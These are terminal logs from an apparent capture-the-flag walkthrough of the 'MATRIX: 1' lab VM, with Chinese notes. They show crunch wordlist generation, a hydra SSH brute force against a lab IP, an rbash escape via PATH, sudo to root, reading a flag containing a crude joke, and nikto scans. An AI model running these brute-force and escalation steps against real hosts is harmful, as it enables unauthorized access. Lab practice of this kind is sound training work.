┌──(rootkwkl)-[/home/kwkl/下载]└─# apt --fix-broken install crunch                                                                                    100 ⨯正在读取软件包列表... 完成正在分析软件包的依赖关系树... 完成正在读取状态信息... 完成              您也许需要运行“apt --fix-broken install”来修正上面的错误。下列软件包有未满足的依赖关系: fern-wifi-cracker : 依赖: python3-pyqt5 但是它将不会被安装 python3-pyqt5-dbg : 依赖: python3-dbg 但是它将不会被安装                    依赖: python3-pyqt5 (= 5.15.2+dfsg-3) 但是它将不会被安装                    依赖: python3-pyqt5.sip-dbg (>= 12.8) 但无法安装它E: 有未能满足的依赖关系。请尝试不指明软件包的名字来运行“apt --fix-broken install”(也可以指定一个解决办法)。

──(rootkwkl)-[/home/kwkl/下载]└─# wget archive.kali.org/archive-key.asc  //下载签名                                                                100 ⨯

apt-key add archive-key.asc  //安装签名

--2021-11-23 23:58:26--  http://archive.kali.org/archive-key.asc正在解析主机 archive.kali.org (archive.kali.org)... 192.99.45.140正在连接 archive.kali.org (archive.kali.org)|192.99.45.140|:80... 已连接。已发出 HTTP 请求,正在等待回应... 200 OK长度:3155 (3.1K) [application/octet-stream]正在保存至: “archive-key.asc”

archive-key.asc                100%[====================================================>]  3.08K  2.51KB/s  用时 1.2s   

2021-11-23 23:58:28 (2.51 KB/s) - 已保存 “archive-key.asc” [3155/3155])

//下载签名: 地址缺少协议类型.下载完毕 --2021-11-23 23:58:28--总用时:2.3s下载了:1 个文件,1.2s (2.51 KB/s) 中的 3.1KWarning: apt-key is deprecated. Manage keyring files in trusted.gpg.d instead (see apt-key(8)).gpg: 无法打开 ‘//安装签名’: 没有那个文件或目录                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─#                                                                                                                      2 ⨯apt-key add archive-key.asc           

Warning: apt-key is deprecated. Manage keyring files in trusted.gpg.d instead (see apt-key(8)).OK                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─#

root@kali:~# crunch 8 8 -t k1ll0r%@ -o dict.txtCrunch will now generate the following amount of data: 2340 bytes0 MB0 GB0 TB0 PBCrunch will now generate the following number of lines: 260

crunch: 100% completed generating outputroot@kali:~# lsDesktop  Documents  Music    Public    Videosdict.txt  Downloads  Pictures  Templatesroot@kali:~# cat dict.txtk1ll0r0ak1ll0r0bk1ll0r0ck1ll0r0dk1ll0r0ek1ll0r0fk1ll0r0gk1ll0r0hk1ll0r0ik1ll0r0jk1ll0r0kk1ll0r0lk1ll0r0mk1ll0r0nk1ll0r0ok1ll0r0pk1ll0r0qk1ll0r0rk1ll0r0sk1ll0r0tk1ll0r0uk1ll0r0vk1ll0r0wk1ll0r0xk1ll0r0yk1ll0r0zk1ll0r1ak1ll0r1bk1ll0r1ck1ll0r1dk1ll0r1ek1ll0r1fk1ll0r1gk1ll0r1hk1ll0r1ik1ll0r1jk1ll0r1kk1ll0r1lk1ll0r1mk1ll0r1nk1ll0r1ok1ll0r1pk1ll0r1qk1ll0r1rk1ll0r1sk1ll0r1tk1ll0r1uk1ll0r1vk1ll0r1wk1ll0r1xk1ll0r1yk1ll0r1zk1ll0r2ak1ll0r2bk1ll0r2ck1ll0r2dk1ll0r2ek1ll0r2fk1ll0r2gk1ll0r2hk1ll0r2ik1ll0r2jk1ll0r2kk1ll0r2lk1ll0r2mk1ll0r2nk1ll0r2ok1ll0r2pk1ll0r2qk1ll0r2rk1ll0r2sk1ll0r2tk1ll0r2uk1ll0r2vk1ll0r2wk1ll0r2xk1ll0r2yk1ll0r2zk1ll0r3ak1ll0r3bk1ll0r3ck1ll0r3dk1ll0r3ek1ll0r3fk1ll0r3gk1ll0r3hk1ll0r3ik1ll0r3jk1ll0r3kk1ll0r3lk1ll0r3mk1ll0r3nk1ll0r3ok1ll0r3pk1ll0r3qk1ll0r3rk1ll0r3sk1ll0r3tk1ll0r3uk1ll0r3vk1ll0r3wk1ll0r3xk1ll0r3yk1ll0r3zk1ll0r4ak1ll0r4bk1ll0r4ck1ll0r4dk1ll0r4ek1ll0r4fk1ll0r4gk1ll0r4hk1ll0r4ik1ll0r4jk1ll0r4kk1ll0r4lk1ll0r4mk1ll0r4nk1ll0r4ok1ll0r4pk1ll0r4qk1ll0r4rk1ll0r4sk1ll0r4tk1ll0r4uk1ll0r4vk1ll0r4wk1ll0r4xk1ll0r4yk1ll0r4zk1ll0r5ak1ll0r5bk1ll0r5ck1ll0r5dk1ll0r5ek1ll0r5fk1ll0r5gk1ll0r5hk1ll0r5ik1ll0r5jk1ll0r5kk1ll0r5lk1ll0r5mk1ll0r5nk1ll0r5ok1ll0r5pk1ll0r5qk1ll0r5rk1ll0r5sk1ll0r5tk1ll0r5uk1ll0r5vk1ll0r5wk1ll0r5xk1ll0r5yk1ll0r5zk1ll0r6ak1ll0r6bk1ll0r6ck1ll0r6dk1ll0r6ek1ll0r6fk1ll0r6gk1ll0r6hk1ll0r6ik1ll0r6jk1ll0r6kk1ll0r6lk1ll0r6mk1ll0r6nk1ll0r6ok1ll0r6pk1ll0r6qk1ll0r6rk1ll0r6sk1ll0r6tk1ll0r6uk1ll0r6vk1ll0r6wk1ll0r6xk1ll0r6yk1ll0r6zk1ll0r7ak1ll0r7bk1ll0r7ck1ll0r7dk1ll0r7ek1ll0r7fk1ll0r7gk1ll0r7hk1ll0r7ik1ll0r7jk1ll0r7kk1ll0r7lk1ll0r7mk1ll0r7nk1ll0r7ok1ll0r7pk1ll0r7qk1ll0r7rk1ll0r7sk1ll0r7tk1ll0r7uk1ll0r7vk1ll0r7wk1ll0r7xk1ll0r7yk1ll0r7zk1ll0r8ak1ll0r8bk1ll0r8ck1ll0r8dk1ll0r8ek1ll0r8fk1ll0r8gk1ll0r8hk1ll0r8ik1ll0r8jk1ll0r8kk1ll0r8lk1ll0r8mk1ll0r8nk1ll0r8ok1ll0r8pk1ll0r8qk1ll0r8rk1ll0r8sk1ll0r8tk1ll0r8uk1ll0r8vk1ll0r8wk1ll0r8xk1ll0r8yk1ll0r8zk1ll0r9ak1ll0r9bk1ll0r9ck1ll0r9dk1ll0r9ek1ll0r9fk1ll0r9gk1ll0r9hk1ll0r9ik1ll0r9jk1ll0r9kk1ll0r9lk1ll0r9mk1ll0r9nk1ll0r9ok1ll0r9pk1ll0r9qk1ll0r9rk1ll0r9sk1ll0r9tk1ll0r9uk1ll0r9vk1ll0r9wk1ll0r9xk1ll0r9yk1ll0r9zroot@kali:~#

┌──(rootkwkl)-[/home/kwkl/下载]└─# hydra -l guest -P dict.txt 172.16.70.139 sshHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-24 00:09:14[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task[DATA] attacking ssh://172.16.70.139:22/

┌──(rootkwkl)-[/home/kwkl/下载]

└─# hydra -l guest -P dict.txt 172.16.70.139 ssh

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-24 00:09:14

[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4

[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task

[DATA] attacking ssh://172.16.70.139:22/

[STATUS] 179.00 tries/min, 179 tries in 00:01h, 84 to do in 00:01h, 16 active

[22][ssh] host: 172.16.70.139   login: guest   password: k1ll0r7n

1 of 1 target successfully completed, 1 valid password found

[WARNING] Writing restore file because 3 final worker threads did not complete untilend.

[ERROR] 3 targets did not resolve or could not be connected

[ERROR] 0 target did not complete

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-24 00:10:18


┌──(rootkwkl)-[/home/kwkl/下载]

└─# 

┌──(rootkwkl)-[/home/kwkl/下载]

└─# ssh [email protected]                                                                                           255 ⨯

The authenticity of host '172.16.70.139 (172.16.70.139)' can't be established.

ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '172.16.70.139' (ECDSA) to the list of known hosts.

[email protected]'s password: 

Last login: Mon Aug6 16:25:44 2018 from 192.168.56.102

guest@porteus:~$ 

guest@porteus:~$ 

guest@porteus:~$ 

/home/guest/Desktop /home/guest/Documents /home/guest/Downloads /home/guest/Music /home/guest/Pictures /home/guest/Public /home/guest/Videos /home/guest/prog

guest@porteus:~$ echo /home/guest/prog/*

/home/guest/prog/vi

guest@porteus:~$ echo $SHELL

/bin/rbash

guest@porteus:~$ export PATH=/usr/bin:/bin/

guest@porteus:~$ sudo -l

User guest may run the following commands on porteus:

  (ALL) ALL

  (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper

  (trinity) NOPASSWD: /bin/cp

guest@porteus:~$ sudo su

We trust you have received the usual lecture from the local System

Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.

#2) Think before you type.

#3) With great power comes great responsibility.

Password: 

root@porteus:/home/guest# cat flag.txt

cat: flag.txt: No such file or directory

root@porteus:/home/guest# ls

Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ prog/

root@porteus:/home/guest# cd

root@porteus:~# ls

Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ flag.txt

root@porteus:~# cat flag.txt

_,-. 

,-' _|                 EVER REWIND OVER AND OVER AGAIN THROUGH THE

|_,-O__`-._             INITIAL AGENT SMITH/NEO INTERROGATION SCENE

|`-._\`.__ `_.           IN THE MATRIX AND BEAT OFF 

|`-._`-.\,-'_| _,-'. 

 `-.|.-' | |`.-'|_     WHAT 

|     |_|,-'_`.                                            

|-._,-' |     NO, ME NEITHER 

jrei | |   _,'                                            

'-|_,-' IT'S JUST A HYPOTHETICAL QUESTION    

root@porteus:~# 

guest@porteus:~$ export PATH=/usr/bin:/bin/

guest@porteus:~$ sudo -l

User guest may run the following commands on porteus:

  (ALL) ALL

  (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper

  (trinity) NOPASSWD: /bin/cp

guest@porteus:~$ sudo su

root@porteus:/home/guest# cd

root@porteus:~# ls

Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ flag.txt

root@porteus:~# 

─# ./nikto.pl -host 172.16.70.139                                                                                                                   1 ⨯

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:172.16.70.139

+ Target Hostname:172.16.70.139

+ Target Port:80

+ Start Time: 2021-11-24 00:35:00 (GMT8)

---------------------------------------------------------------------------

+ Server: SimpleHTTP/0.6 Python/2.7.14

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.

+ No CGI Directories found (use '-C all' to force check all possible dirs)

+ Python/2.7.14 appears to be outdated (current is at least 3.8.0)

+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)

+ ERROR: Error limit (20) reached for host, giving up. Last error: invalid HTTP response

+ SCAN TERMINATED:16 error(s) and 4 item(s) reported on remote host

+ End Time: 2021-11-24 00:35:12 (GMT8) (12 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested


┌──(rootkwkl)-[/opt/nikto-master/program]

└─# ./nikto.pl -host 172.16.70.139 -C all                                                                                                           1 ⨯

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:172.16.70.139

+ Target Hostname:172.16.70.139

+ Target Port:80

+ Start Time: 2021-11-24 00:35:37 (GMT8)

---------------------------------------------------------------------------

+ Server: SimpleHTTP/0.6 Python/2.7.14

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.

+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)

+ Python/2.7.14 appears to be outdated (current is at least 3.8.0)

+ ERROR: Error limit (20) reached for host, giving up. Last error: invalid HTTP response

+ SCAN TERMINATED:20 error(s) and 4 item(s) reported on remote host

+ End Time: 2021-11-24 00:35:45 (GMT8) (8 seconds)

------------------------------------------------------------------------

你可能感兴趣的:(MATRIX: 1 2021-11-25)